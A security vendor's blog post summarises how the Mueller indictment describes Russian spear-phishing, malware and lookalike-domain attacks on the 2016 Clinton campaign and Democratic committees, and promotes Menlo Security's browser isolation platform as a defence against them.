Regardless of the political fall-out from Special Counsel Robert J. Mueller’s indictment of twelve Russian intelligence operatives for tampering with the 2016 U.S. Presidential election, this much seems clear after reading the 29-page, John LeCarre-like document: It has become unreasonable to expect any organization to successfully defend against such a massive, coordinated cyberattack.
The document reads like a cybersecurity executives’ worst nightmare. The Russians employed nearly a dozen methods to steal and then anonymously distribute hundreds of thousands of emails and other documents taken from the Clinton Campaign and Democratic Party organizations. Some of the defendants even conspired to hack into the computers of state boards of elections, secretaries of state, and the software companies that supplied software and other technology related to the 2016 U.S. Presidential election.
The sophistication of these efforts is breathtaking. To pull off phase one of the attack—stealing the documents in the first place—the conspirators launched a massive spear-phishing campaign, leveraging social engineering to create and send customized emails designed to fool specific individuals into sharing their credentials or inadvertently downloading malware onto their devices. Starting in March 2016, the conspirators targeted more than 300 people associated with the Clinton Campaign, the Democratic National Committee (DNC), and the Democratic Congressional Campaign Committee (DCCC). The actual email address looked like a legitimate security notification from Google, asking the recipient to click on a link to change their Gmail password for their own protection. Leaving little to chance, the conspirators used a URL shortener, so the URL for the fake password-reset page would not raise suspicions. This tactic was how the GRU, Russia’s main spy agency, stole over 50,000 emails from the chairman of the Clinton Campaign, John Podesta. He was hardly alone. According to the indictment, hundreds of others were similarly victimized.
Once these victims shared their credentials, the GRU units were able to read and monitor all of the emails in their inbox, and send emails as if they were coming from the target’s email account. These spear-phishing attacks continued through the summer and autumn of 2016, right up to the 2016 U.S. Presidential election. In July of that year, the conspirators for the first time spear-fished accounts of a third-party provider used by Hillary Clinton’s personal office, according to the indictment.
The Russians were after more than credentials. When a DCCC employee clicked on a spearfishing email in April 2016, the GRU was able to install multiple versions of a program called X-Agent that allowed it to monitor DCCC employee’s devices, log their activity right down to their keystrokes, steal their passwords, and maintain access to the overall DCCC network.
The conspirators used other, more complex methods as well. In one case, they created a phony email account that contained the name of a Clinton campaign official, with just one incorrect letter. More than 30 Clinton staffers received emails from this “spoofed” account. If they didn’t notice the misspelling and clicked on the email, they were brought to a page containing an embedded link granting them access to a fake document called “hillary-clinton-favorable-rating.xlsx.” If they clicked on this enticingly-named file, they ended up on yet another GRU-created website that likely downloaded malware onto their PC or other device.
The conspirators were no slouches at putting the stolen credentials to work for their cause. In June 2016, they registered a domain, actblues.com, that mimicked the domain of a legitimate political fundraising site, actblue.com. They used the stolen DCCC credentials to modify the DCCC website, so visitors would unknowingly be redirected to the bogus actblues.com domain. The indictment did not say how much money was stolen from the DCCC in this manner. When it came time to distribute the stolen documents without implicating Russia, they set up domains such as dcleaks.com, and used spoofed and phony email addresses to strategically leak the stolen documents in stages to organizations believed to include Wikileaks.
And, oh, by the way, the Russians paid most of the costs for the bogus sites using anonymous cryptocurrency transactions. Who knows? Maybe they stole that money as well via malicious techniques, such as cryptojacking.
So what’s the lesson? While not impossible, cobbling together all the traditional cybersecurity tools required to address such a multi-headed attack is a formula for failure. Realistically, there’s very little chance the target of such an assault could have identified every last phishing email and spotted every instance of carefully-concealed malware.
Currently, the only surefire defense that could have stopped the Russian assault in its tracks is a technology called browser isolation. This approach, sometimes called remote browsing, can stop phishing and spear-phishing attacks, defang weaponized documents, and prevent any malicious software from ever reaching its intended targets in the first place. Isolation inserts a secure, trusted execution environment—or isolation platform—between the user and potential sources of attack or infection. User web sessions are executed away from the user’s device, and what is delivered is only safe rendering information.
If isolation technology, such as our Menlo Security Isolation Platform (MSIP) had been in place, then the spear-phishing links that were masked by URL shorteners would have been re-written, and all phishing webpages would have been isolated in our cloud-based platform, far from the user’s device. If those webpages were loaded with malware, with isolation deployed, there would have been no way for the malware to reach campaign aides’ devices. Any weaponized document downloaded would have also been stopped by MSIP; the user would have been able to view the document in HTML5, or download a safe PDF version of the document. If the user required the original, then, based on administrator policies, they might have been able to download the original document, but only after it went through extensive scanning and sandboxing. So, no keylogging, screenshot captures, or monitoring by the “bad guys” – which means no credential theft, and importantly, no additional, even more costly attacks.
Isolation also puts an end to phishing, spear-phishing and other types of email attacks. By configuring our Isolation Platform to render web pages in “read only” mode, it would be impossible for an unsuspecting volunteer or campaign chairman to type their credentials into a bogus password reset page, even if they were successfully tricked into accessing it by a cleverly designed spear-phishing email.
Of course, hindsight is 20/20. But theoretically, an isolation platform like ours could have prevented the successful attacks on the Clinton Campaign, DNC, and DCCC—and on our Democracy. At worst, it would have made those attacks much more difficult to pull off. Why not consider an approach that raises the likelihood of a successful defense—and shifts the lousy odds to the “bad guys”?
For more information on Menlo Security’s Isolation Platform and spear-phishing, please download our report, “Anatomy of a Spear Phishing Attack.”
For more information on how cybercriminals deliver malware today, please download our report, “Microsoft Office – The New Platform for Exploiting Zero-Days.”
For more information on how cybercriminals are exploiting traditional measures of trust on the web, please download our “State of the Web 2017” report.